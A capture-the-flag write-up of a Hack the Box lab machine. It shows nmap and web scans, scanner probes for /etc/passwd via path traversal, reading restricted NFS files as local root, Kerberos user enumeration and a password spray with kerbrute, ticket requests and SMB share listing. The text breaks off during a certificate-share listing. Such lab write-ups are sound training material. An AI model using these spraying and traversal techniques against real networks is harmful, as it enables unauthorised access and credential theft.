Box Info
Box Name: VulnCicada
Listed Difficulty Rating: Medium
chasepd’s Difficulty Rating: Medium-Hard (mostly due to flaky and complicated exploit)
Release Date: 2025 (Formerly from Vulnlab, acquired by Hack the Box)
Tech Stack: Kerberos, NFS, Active Directory, Active Directory Certificate Services
Skills Learned: NFS enumeration, Active Directory enumeration, ADCS exploits
Recon
To start, add some hostnames to /etc/hosts/ to make referencing the box easier. I always add boxname as well as boxname.htb to start with. For former vulnlab machines like this one, I also add boxname.vl as sometimes these boxes use that naming.
As always, we run an nmap scan to get some basic intel on the machine. Since it’s a Windows machine, we should also run enum4linux.
└──╼ $nmap -oN nmapscan -A vulncicada
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-07-03 10:29 MDT
Stats: 0:01:52 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 96.77% done; ETC: 10:31 (0:00:00 remaining)
Nmap scan report for vulncicada (10.129.29.26)
Host is up (0.067s latency).
Not shown: 985 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
|_http-title: IIS Windows Server
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-07-03 16:29:36Z)
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/tcp6 rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 2,3,4 111/udp6 rpcbind
| 100003 2,3 2049/udp nfs
| 100003 2,3 2049/udp6 nfs
| 100003 2,3,4 2049/tcp nfs
| 100003 2,3,4 2049/tcp6 nfs
| 100005 1,2,3 2049/tcp mountd
| 100005 1,2,3 2049/tcp6 mountd
| 100005 1,2,3 2049/udp mountd
| 100005 1,2,3 2049/udp6 mountd
| 100021 1,2,3,4 2049/tcp nlockmgr
| 100021 1,2,3,4 2049/tcp6 nlockmgr
| 100021 1,2,3,4 2049/udp nlockmgr
| 100021 1,2,3,4 2049/udp6 nlockmgr
| 100024 1 2049/tcp status
| 100024 1 2049/tcp6 status
| 100024 1 2049/udp status
|_ 100024 1 2049/udp6 status
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: cicada.vl0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=DC-JPQ225.cicada.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC-JPQ225.cicada.vl
| Not valid before: 2024-09-13T10:42:50
|_Not valid after: 2025-09-13T10:42:50
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: cicada.vl0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC-JPQ225.cicada.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC-JPQ225.cicada.vl
| Not valid before: 2024-09-13T10:42:50
|_Not valid after: 2025-09-13T10:42:50
|_ssl-date: TLS randomness does not represent time
2049/tcp open nlockmgr 1-4 (RPC #100021)
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: cicada.vl0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=DC-JPQ225.cicada.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC-JPQ225.cicada.vl
| Not valid before: 2024-09-13T10:42:50
|_Not valid after: 2025-09-13T10:42:50
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: cicada.vl0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC-JPQ225.cicada.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC-JPQ225.cicada.vl
| Not valid before: 2024-09-13T10:42:50
|_Not valid after: 2025-09-13T10:42:50
|_ssl-date: TLS randomness does not represent time
3389/tcp open ms-wbt-server Microsoft Terminal Services
|_ssl-date: 2025-07-03T16:31:03+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=DC-JPQ225.cicada.vl
| Not valid before: 2025-04-09T08:36:14
|_Not valid after: 2025-10-09T08:36:14
Service Info: Host: DC-JPQ225; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
| smb2-time:
| date: 2025-07-03T16:30:27
|_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 137.45 seconds
From the nmap scan we now know that the box is DC-JPQ225.cicada.vl. We should add this to our hosts file, since it’s likely we’ll need to use the correct hostname to interact with Kerberos, which is also running here. There’s also a website, so we’ll need to check that out. Interestingly, the port for RDP is open, so we may be able to RDP in if we can get credentials.
enum4linux doesn’t give us anything helpful. smbclient -L \\\\cicada.vl tells us SMB shares aren’t enabled. Time to check out the website and see what info that might give us.
The website is just the default IIS page:
When doing web enumeration I run three commands simultaneously:
gobuster dir -u http://cicada.vl -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -t 50
This does a broad spread of web enumeration looking for default directories and endpoints.
dirsearch -u http://cicada.vl
dirsearch is more or less the same as gobuster, but I like to run it in tandem with its default wordlist because occasionally it will find things that my default gobuster enum misses.
gobuster vhost --append-domain -u http://cicada.vl -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txt
This looks for subdomains that might exist on the host, which might surface alternate web apps we can enumerate and exploit. The --append-domain flag tells gobuster that we’re looking for subdomains of the original domain we provided.
Neither of our gobuster searches turn up anything, but dirsearch comes back with:
└──╼ $dirsearch -u http://cicada.vl
_|. _ _ _ _ _ _|_ v0.4.3
(_||| _) (/_(_|| (_| )
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460
Output File: /home/chasepd/htb/vulncicada/reports/http_cicada.vl/_25-07-03_10-44-38.txt
Target: http://cicada.vl/
[10:44:38] Starting:
[10:44:39] 403 - 312B - /%2e%2e//google.com
[10:44:39] 403 - 312B - /.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
[10:44:44] 403 - 312B - /\..\..\..\..\..\..\..\..\..\etc\passwd
[10:44:52] 403 - 1KB - /certenroll/
[10:44:52] 401 - 1KB - /certsrv/
[10:44:52] 403 - 312B - /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
Foothold
Most of these results are likely garbage, but /certenroll/ and /certsrv/ both stick out as interesting and unusual. A quick search for these shows us that these endpoints are likely related to Active Directory Certificate Services, specifically Certification Authority Web Enrollment. Certificate Authorities are what provide certificates for various services. For example, they are mutually trusted third-parties that sign SSL/TLS certificates. Browsers include trusts for these certificate authorities and use their public keys to verify SSL certificates that claim to have been issued by them. Unfortunately for us currently, /certenroll/ gives a 403 response and /certsrv/ asks for a username and password when we navigate to it in a browser, so we can’t do anything with this yet.
Looking back at the nmap results, we see that there’s an NFS (Network File System) server running on port 2049. Let’s check out what might be available there.
There’s a publicly available folder on it:
└──╼ $showmount -e cicada.vl
Export list for cicada.vl:
/profiles (everyone)
Let’s mount this and see what is there:
┌─[chasepd@THE-HACKINATOR]─[~/htb/vulncicada]
└──╼ $sudo mkdir /mnt/cicada_nfs
┌─[chasepd@THE-HACKINATOR]─[~/htb/vulncicada]
└──╼ $sudo mount -t nfs cicada.vl:/profiles /mnt/cicada_nfs/
┌─[chasepd@THE-HACKINATOR]─[~/htb/vulncicada]
└──╼ $ls -la /mnt/cicada_nfs/
total 10
drwxrwxrwx 2 nobody nogroup 4096 Jun 3 04:21 .
drwxr-xr-x 1 root root 20 Jul 3 11:09 ..
drwxrwxrwx 2 nobody nogroup 64 Sep 15 2024 Administrator
drwxrwxrwx 2 nobody nogroup 64 Sep 13 2024 Daniel.Marshall
drwxrwxrwx 2 nobody nogroup 64 Sep 13 2024 Debra.Wright
drwxrwxrwx 2 nobody nogroup 64 Sep 13 2024 Jane.Carter
drwxrwxrwx 2 nobody nogroup 64 Sep 13 2024 Jordan.Francis
drwxrwxrwx 2 nobody nogroup 64 Sep 13 2024 Joyce.Andrews
drwxrwxrwx 2 nobody nogroup 64 Sep 13 2024 Katie.Ward
drwxrwxrwx 2 nobody nogroup 64 Sep 13 2024 Megan.Simpson
drwxrwxrwx 2 nobody nogroup 64 Sep 13 2024 Richard.Gibbons
drwxrwxrwx 2 nobody nogroup 64 Sep 15 2024 Rosie.Powell
drwxrwxrwx 2 nobody nogroup 64 Sep 13 2024 Shirley.West
A bunch of directories named after (presumably) users. This is already very helpful as it gives us some potential usernames to start working with, but lets dig in and see what else we can find in these directories.
There are only two directories with anything in them, Administrator, and Rosie.Powell:
┌─[chasepd@THE-HACKINATOR]─[/mnt/cicada_nfs/Rosie.Powell]
└──╼ $la
total 1.8M
drwxrwxrwx 2 nobody nogroup 64 Sep 15 2024 .
drwxrwxrwx 2 nobody nogroup 4.0K Jun 3 04:21 ..
drwx------ 2 nobody nogroup 64 Sep 15 2024 Documents
-rwx------ 1 nobody nogroup 1.8M Sep 13 2024 marketing.png
┌─[chasepd@THE-HACKINATOR]─[/mnt/cicada_nfs/Administrator]
└──╼ $la
total 1.5M
drwxrwxrwx 2 nobody nogroup 64 Sep 15 2024 .
drwxrwxrwx 2 nobody nogroup 4.0K Jun 3 04:21 ..
drwx------ 2 nobody nogroup 64 Sep 15 2024 Documents
-rwxrwxrwx 1 nobody nogroup 1.5M Sep 13 2024 vacation.png
The only thing we actually have access to here is vacation.png, which is a lovely picture of the Admin working while traveling. Just what everone should do for a nice, relaxing vacation.
However, while this has presumably preserved the file permissions from the server, theoretically this share is now mounted on our machine, and our attacker machine’s root user has access to everything on our attacker machine. What happens if we try and access this share as root?
Sure enough, we can access the restricted files. The Documents folders of both users are boring and just contain desktop.ini files as well as recycled old desktop.ini files, but the restricted marketing.png file is interesting:
Rosie.Powell has provided us with an image of her working, and it tells us two important things. One, that Cicada gives their employees RGB-clad gaming PCs to work on and we should all apply there as soon as possible, and also that Rosie keeps a sticky note on her desk with what looks like a password written on it: Cicada123.
Sadly, Rosie.Powell doesn’t appear to have access to ADCS, but that’s not really that surprising given she’s in marketing. However, she still may have access to enumerate the domain, or connect via RDP.
RDP ends up being a dud, and ldapdomaindump tells us that the credentials Rosie.Powell:Cicada123 are invalid. However, there are a bunch of users we know about, and maybe this is a default password or something. Let’s see if any of the other users we discovered are using that password.
With our basic wordlists built, let’s try some stuff:
┌─[chasepd@THE-HACKINATOR]─[~/htb/vulncicada]
└──╼ $cat users
Administrator
Daniel.Marshall
Debra.Wright
Jane.Carter
Jordan.Francis
Joyce.Andrews
Katie Ward
Megan.Simpson
Richard.Gibbons
Rosie.Powell
Shirley.West
┌─[chasepd@THE-HACKINATOR]─[~/htb/vulncicada]
└──╼ $cat passwords
Cicada123
Since Kerberos is running and we know we’re already hitting STATUS_NOT_SUPPORTED (which can mean the auth method we’re using isn’t supported by the server) on SMB, let’s try Kerbrute to bruteforce Kerberos creds.
First we can check that these usernames we have are actually real:
└──╼ $kerbrute userenum --dc DC-JPQ225.cicada.vl -d cicada.vl users
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/
Version: dev (9cfb81e) - 07/03/25 - Ronnie Flathers @ropnop
2025/07/03 11:47:26 > Using KDC(s):
2025/07/03 11:47:26 > DC-JPQ225.cicada.vl:88
2025/07/03 11:47:26 > [+] VALID USERNAME: Joyce.Andrews@cicada.vl
2025/07/03 11:47:26 > [+] VALID USERNAME: Daniel.Marshall@cicada.vl
2025/07/03 11:47:26 > [+] VALID USERNAME: Debra.Wright@cicada.vl
2025/07/03 11:47:26 > [+] VALID USERNAME: Megan.Simpson@cicada.vl
2025/07/03 11:47:26 > [+] VALID USERNAME: Administrator@cicada.vl
2025/07/03 11:47:26 > [+] VALID USERNAME: Jane.Carter@cicada.vl
2025/07/03 11:47:26 > [+] VALID USERNAME: Richard.Gibbons@cicada.vl
2025/07/03 11:47:26 > [+] VALID USERNAME: Jordan.Francis@cicada.vl
2025/07/03 11:47:26 > [+] VALID USERNAME: Rosie.Powell@cicada.vl
2025/07/03 11:47:26 > Done! Tested 11 usernames (9 valid) in 0.131 seconds
Very nice, we have 9 valid users. Lets see if any of them are using Cicada123 as their password.
└──╼ $kerbrute passwordspray --dc DC-JPQ225.cicada.vl -d cicada.vl users Cicada123
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/
Version: dev (9cfb81e) - 07/03/25 - Ronnie Flathers @ropnop
2025/07/03 11:49:05 > Using KDC(s):
2025/07/03 11:49:05 > DC-JPQ225.cicada.vl:88
2025/07/03 11:49:05 > [+] VALID LOGIN: Rosie.Powell@cicada.vl:Cicada123
2025/07/03 11:49:05 > Done! Tested 11 logins (1 successes) in 0.213 seconds
So Rosie IS using Cicada123 as her password; we just need to auth with Kerberos instead. cracks knuckles
Let’s start by setting up /etc/krb5.conf on our attacker machine:
[libdefaults]
default_realm = CICADA.VL
dns_lookup_realm = false
dns_lookup_kdc = false
ticket_lifetime = 24h
forwardable = true
rdns = false
[realms]
CICADA.VL = {
kdc = DC-JPQ225.cicada.vl:88
admin_server = DC-JPQ225.cicada.vl:749
default_domain = cicada.vl
}
[domain_realm]
.cicada.vl = CICADA.VL
cicada.vl = CICADA.VL
┌─[chasepd@THE-HACKINATOR]─[~/htb/vulncicada]
└──╼ $kinit Rosie.Powell@CICADA.VL
Password for Rosie.Powell@CICADA.VL:
┌─[chasepd@THE-HACKINATOR]─[~/htb/vulncicada]
└──╼ $klist
Ticket cache: FILE:/tmp/krb5cc_1000
Default principal: Rosie.Powell@CICADA.VL
Valid starting Expires Service principal
07/03/2025 11:53:55 07/03/2025 21:53:55 krbtgt/CICADA.VL@CICADA.VL
renew until 07/04/2025 11:53:52
Sure enough, we have a valid ticket.
Going Deeper
We can export it to tell impacket and other tools where to get at it:
export KRB5CCNAME=/tmp/krb5cc_1000
Let’s request service tickets for several services and see what we can do:
└──╼ $kvno HOST/DC-JPQ225.cicada.vl@CICADA.VL
HOST/DC-JPQ225.cicada.vl@CICADA.VL: kvno = 5
└──╼ $kvno HTTP/DC-JPQ225.cicada.vl@CICADA.VL
HTTP/DC-JPQ225.cicada.vl@CICADA.VL: kvno = 5
└──╼ $klist
Ticket cache: FILE:/tmp/krb5cc_1000
Default principal: Rosie.Powell@CICADA.VL
Valid starting Expires Service principal
07/03/2025 11:53:55 07/03/2025 21:53:55 krbtgt/CICADA.VL@CICADA.VL
renew until 07/04/2025 11:53:52
07/03/2025 12:01:09 07/03/2025 21:53:55 HTTP/DC-JPQ225.cicada.vl@CICADA.VL
renew until 07/04/2025 11:53:52
07/03/2025 12:02:37 07/03/2025 21:53:55 HOST/DC-JPQ225.cicada.vl@CICADA.VL
renew until 07/04/2025 11:53:52
We’re able to get in via SMB:
└──╼ $impacket-smbclient -k -no-pass cicada.vl/Rosie.Powell@DC-JPQ225.cicada.vl
Impacket v0.11.0 - Copyright 2023 Fortra
Type help for list of commands
# shares
ADMIN$
C$
CertEnroll
IPC$
NETLOGON
profiles$
SYSVOL
Best of all we seem to have access to the CertEnroll share:
# use CertEnroll
# ls
drw-rw-rw- 0 Thu Jul 3 10:29:36 2025 .
drw-rw-rw- 0 Fri Sep 13 09:17:59 2024 ..
-rw-rw-rw- 741 Thu Jul 3 10:24:29 2025 cicada-DC-JPQ225-CA(1)+.crl
-rw-rw-rw- 941 Thu Jul 3 10:24:29 2025 cicada-DC-JPQ225-CA(1).crl
-rw-rw-rw- 742 Thu Jul 3 10:24:28 2025 cicada-DC-JPQ225-CA(10)+.crl
-rw-rw-rw- 943 Thu Jul 3 10:24:28 2025 cicada-DC-JPQ225-CA(10).crl
-rw-rw-rw- 742 Thu Jul 3 10:24:28 2025 cicada-DC-JPQ225-CA(11)+.crl
-rw-rw-rw- 943 Thu Jul 3 10:24:28 2025 cicada-DC-JPQ225-CA(11).crl
-rw-rw-rw- 742 Thu Jul 3 10:24:28 2025 cicada-DC-JPQ225-CA(12)+.crl
-rw-rw-rw- 943 Thu Jul 3 10:24:28 2025 cicada-DC-JPQ225-CA(12).crl
-rw-rw-rw- 742 Thu Jul 3 10:24:28 2025 cicada-DC-JPQ225-CA(13)+.crl
-rw-rw-rw- 943 Thu Jul 3 10:24:28 2025 cicada-DC-JPQ225-CA(13).crl
-rw-rw-rw- 742 Thu Jul 3 10:24:28 2025 cicada-DC-JPQ225-CA(14)+.crl
-rw-rw-rw- 943 Thu Jul 3 10:24:28 2025 cicada-DC-JPQ225-CA(14).crl
-rw-rw-rw- 742 Thu Jul 3 10:24:28 2025 cicada-DC-JPQ225-CA(15)+.crl
-rw-rw-rw- 943 Thu Jul 3 10:24:28 2025 cicada-DC-JPQ225-CA(15).crl
-rw-rw-rw- 742 Thu Jul 3 10:24:28 2025 cicada-DC-JPQ225-CA(16)+.crl
-rw-rw-rw- 943 Thu Jul 3 10:24:28 2025 cicada-DC-JPQ225-CA(16).crl
-rw-rw-rw- 742 Thu Jul 3 10:24:28 2025 cicada-DC-JPQ225-CA(17)+.crl
-rw-rw-rw- 943 Thu Jul 3 10:24:28 2025 cicada-DC-JPQ225-CA(17).crl
-rw-rw-rw- 742 Thu Jul 3 10:24:28 2025 cicada-DC-JPQ225-CA(18)+.crl
-rw-rw-rw- 943 Thu Jul 3 10:24:28 2025 cicada-DC-JPQ225-CA(18).crl
-rw-rw-rw- 742 Thu Jul 3 10:24:28 2025 cicada-DC-JPQ225-CA(19)+.crl
-rw-rw-rw- 943 Thu Jul 3 10:24:28 2025 cicada-DC-JPQ225-CA(19).crl
-rw-rw-rw- 741 Thu Jul 3 10:24:29 2025 cicada-DC-JPQ225-CA(2)+.crl
-rw-rw-rw- 941 Thu Jul 3 10:24:29 2025 cicada-DC-JPQ225-CA(2).crl
-rw-rw-rw- 742 Thu Jul 3 10:24:28 2025 cicada-DC-JPQ225-CA(20)+.crl
-rw-rw-rw- 943 Thu Jul 3 10:24:28 2025 cicada-DC-JPQ225-CA(20).crl
-rw-rw-rw- 742 Thu Jul 3 10:24:28 2025 cicada-DC-JPQ225-CA(21)+.crl
-rw-rw-rw- 943 Thu Jul 3 10:24:28 2025 cicada-DC-JPQ225-CA(21).crl
-rw-rw-rw- 742 Thu Jul 3 10:24:28 2025 cicada-DC-JPQ225-CA(22)+.crl
-rw-rw-rw- 943 Thu Jul 3 10:24:28 2025 cicada-DC-JPQ225-CA(22).crl
-rw-rw-rw- 742 Thu Jul 3 10:24:28 2025 cicada-DC-JPQ225-CA(23)+.crl
-rw-rw-rw- 943 Thu Jul 3 10:24:28 2025 cicada-DC-JPQ225-CA(23).crl
-rw-rw-rw- 742 Thu Jul 3 10:24:28 2025 cicada-DC-JPQ225-CA(24)+.crl
-rw-rw-rw- 943 Thu Jul 3 10:24:28 2025 cicada-DC-JPQ225-CA(24).crl
-rw-rw-rw- 742 Thu Jul 3 10:24:28 2025 cicada-DC-JPQ225-CA(25)+.crl
-rw-rw-rw- 943 Thu Jul 3 10:24:28 2025 cicada-DC-JPQ225-CA(25).crl
-rw-rw-rw- 742 Thu Jul 3 10:24:28 2025 cicada-DC-JPQ225-CA(26)+.crl
-rw-rw-rw- 943 Thu Jul 3 10:24:28 2025 cicada-DC-JPQ225-CA(26).crl
-rw-rw-rw- 742 Thu Jul 3 10:24:28 2025 cicada-DC-JPQ225-CA(27)+.crl
-rw-rw-rw- 943 Thu Jul 3 10:24:28 2025 cicada-DC-JPQ225-CA(27).crl
-rw-rw-rw- 742 Thu Jul 3 10:24:27 2025 cicada-DC-JPQ225-CA(28)+.crl
-rw-rw-rw- 943 Thu Jul 3 10:24:27 2025 cicada-DC-JPQ225-CA(28).crl
-rw-rw-rw- 741 Thu Jul 3 10:24:29 2025 cicada-DC-JPQ225-CA(3)+.crl
-rw-rw-rw- 941 Thu Jul 3 10:24:29 2025 cicada-DC-JPQ225-CA(3).crl
-rw-rw-rw- 741 Thu Jul 3 10:24:29 2025 cicada-DC-JPQ225-CA(4)+.crl
-rw-rw-rw- 941 Thu Jul 3 10:24:29 2025 cicada-DC-JPQ225-CA(4).crl
-rw-rw-rw- 741 Thu Jul 3 10:24:29 2025 cicada-DC-JPQ225-CA(5)+.crl
-rw-rw-rw- 941 Thu Jul 3 10:24:29 2025 cicada-DC-JPQ225-CA(5).crl
-rw-rw-rw- 741 Thu Jul 3 10:24:29 2025 cicada-DC-JPQ225-CA(6)+.crl
-rw-rw-rw- 941 Thu Jul 3 10:24:29 2025 cicada-DC-JPQ225-CA(6).crl
-rw-rw-rw- 741 Thu Jul 3 10:24:29 2025 cicada-DC-JPQ225-CA(7)+.crl
-rw-rw-rw- 941 Thu Jul 3 10:24:29 2025 cicada-DC-JPQ225-CA(7).crl
-rw-rw-rw- 741 Thu Jul 3 10:24:29 2025 cicada-DC-JPQ225-CA(8)+.crl
-rw-rw-rw- 941 Thu Jul 3 10:24:29 2025 cicada-DC-JPQ225-CA(8).crl
-rw-rw-rw- 741 Thu Jul 3 10:24:29 2025 cicada-DC-JPQ225-CA(9)+.crl
-rw-rw-rw- 941 Thu Jul 3 10:24:28 2025 cicada-DC-JPQ225-CA(9).crl
-rw-rw-rw- 736 Thu Jul 3 10:24:29 2025 cicada-DC-JPQ225-CA+.crl
-rw-rw-rw- 933 Thu Jul 3 10:24:29 2025 cicada-DC-JPQ225-CA.crl
-rw-rw-rw- 1385 Sun Sep 15 07:18:43 2024 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(0-1).crt
-rw-rw-rw- 924 Sun Sep 15 01:51:18 2024 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(1).crt
-rw-rw-rw- 1390 Sun Sep 15 07:18:43 2024 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(1-0).crt
-rw-rw-rw- 1390 Sun Sep 15 07:18:43 2024 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(1-2).crt
-rw-rw-rw- 924 Thu Apr 10 02:44:43 2025 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(10).crt
-rw-rw-rw- 1391 Thu Apr 10 23:48:18 2025 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(10-11).crt
-rw-rw-rw- 1391 Thu Apr 10 02:57:00 2025 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(10-9).crt
-rw-rw-rw- 924 Thu Apr 10 02:58:25 2025 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(11).crt
-rw-rw-rw- 1391 Thu Apr 10 23:48:18 2025 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(11-10).crt
-rw-rw-rw- 1391 Thu Apr 10 23:48:18 2025 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(11-12).crt
-rw-rw-rw- 924 Thu Apr 10 03:00:22 2025 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(12).crt
-rw-rw-rw- 1391 Thu Apr 10 23:48:18 2025 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(12-11).crt
-rw-rw-rw- 1391 Thu Apr 10 23:48:18 2025 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(12-13).crt
-rw-rw-rw- 924 Thu Apr 10 03:03:13 2025 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(13).crt
-rw-rw-rw- 1391 Thu Apr 10 23:48:18 2025 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(13-12).crt
-rw-rw-rw- 1391 Tue Jun 3 04:21:47 2025 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(13-14).crt
-rw-rw-rw- 924 Thu Apr 10 23:49:41 2025 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(14).crt
-rw-rw-rw- 1391 Tue Jun 3 04:22:11 2025 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(14-13).crt
-rw-rw-rw- 1391 Tue Jun 3 04:22:11 2025 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(14-15).crt
-rw-rw-rw- 924 Thu Apr 10 23:51:40 2025 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(15).crt
-rw-rw-rw- 1391 Tue Jun 3 04:22:11 2025 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(15-14).crt
-rw-rw-rw- 1391 Tue Jun 3 04:22:12 2025 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(15-16).crt
-rw-rw-rw- 924 Thu Apr 10 23:53:40 2025 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(16).crt
-rw-rw-rw- 1391 Tue Jun 3 04:22:12 2025 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(16-15).crt
-rw-rw-rw- 1391 Wed Jun 4 06:51:26 2025 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(16-17).crt
-rw-rw-rw- 924 Tue Jun 3 04:23:15 2025 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(17).crt
-rw-rw-rw- 1391 Wed Jun 4 06:51:26 2025 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(17-16).crt
-rw-rw-rw- 1391 Wed Jun 4 06:51:26 2025 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(17-18).crt
-rw-rw-rw- 924 Tue Jun 3 04:24:51 2025 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(18).crt
-rw-rw-rw- 1391 Wed Jun 4 06:51:26 2025 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(18-17).crt
-rw-rw-rw- 1391 Wed Jun 4 06:51:27 2025 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(18-19).crt
-rw-rw-rw- 924 Tue Jun 3 04:26:51 2025 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(19).crt
-rw-rw-rw- 1391 Wed Jun 4 06:51:27 2025 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(19-18).crt
-rw-rw-rw- 1391 Wed Jun 4 07:34:59 2025 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(19-20).crt
-rw-rw-rw- 924 Sun Sep 15 01:53:03 2024 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(2).crt
-rw-rw-rw- 1390 Sun Sep 15 07:18:44 2024 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(2-1).crt
-rw-rw-rw- 1390 Sun Sep 29 03:41:29 2024 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(2-3).crt
-rw-rw-rw- 924 Wed Jun 4 06:52:43 2025 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(20).crt
-rw-rw-rw- 1391 Wed Jun 4 07:34:59 2025 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(20-19).crt
-rw-rw-rw- 1391 Wed Jun 4 07:34:59 2025 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(20-21).crt
-rw-rw-rw- 924 Wed Jun 4 06:54:47 2025 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(21).crt
-rw-rw-rw- 1391 Wed Jun 4 07:34:59 2025 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(21-20).crt
-rw-rw-rw- 1391 Wed Jun 4 07:34:59 2025 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(21-22).crt
-rw-rw-rw- 924 Wed Jun 4 06:56:47 2025 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(22).crt
-rw-rw-rw- 1391 Wed Jun 4 07:34:59 2025 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(22-21).crt
-rw-rw-rw- 1391 Wed Jun 4 08:02:35 2025 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(22-23).crt
-rw-rw-rw- 924 Wed Jun 4 07:36:17 2025 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(23).crt
-rw-rw-rw- 1391 Wed Jun 4 08:02:35 2025 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(23-22).crt
-rw-rw-rw- 1391 Wed Jun 4 08:02:35 2025 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(23-24).crt
-rw-rw-rw- 924 Wed Jun 4 07:38:20 2025 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(24).crt
-rw-rw-rw- 1391 Wed Jun 4 08:02:35 2025 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(24-23).crt
-rw-rw-rw- 1391 Wed Jun 4 08:02:35 2025 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(24-25).crt
-rw-rw-rw- 924 Wed Jun 4 07:40:21 2025 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(25).crt
-rw-rw-rw- 1391 Wed Jun 4 08:02:35 2025 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(25-24).crt
-rw-rw-rw- 1391 Thu Jul 3 10:24:27 2025 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(25-26).crt
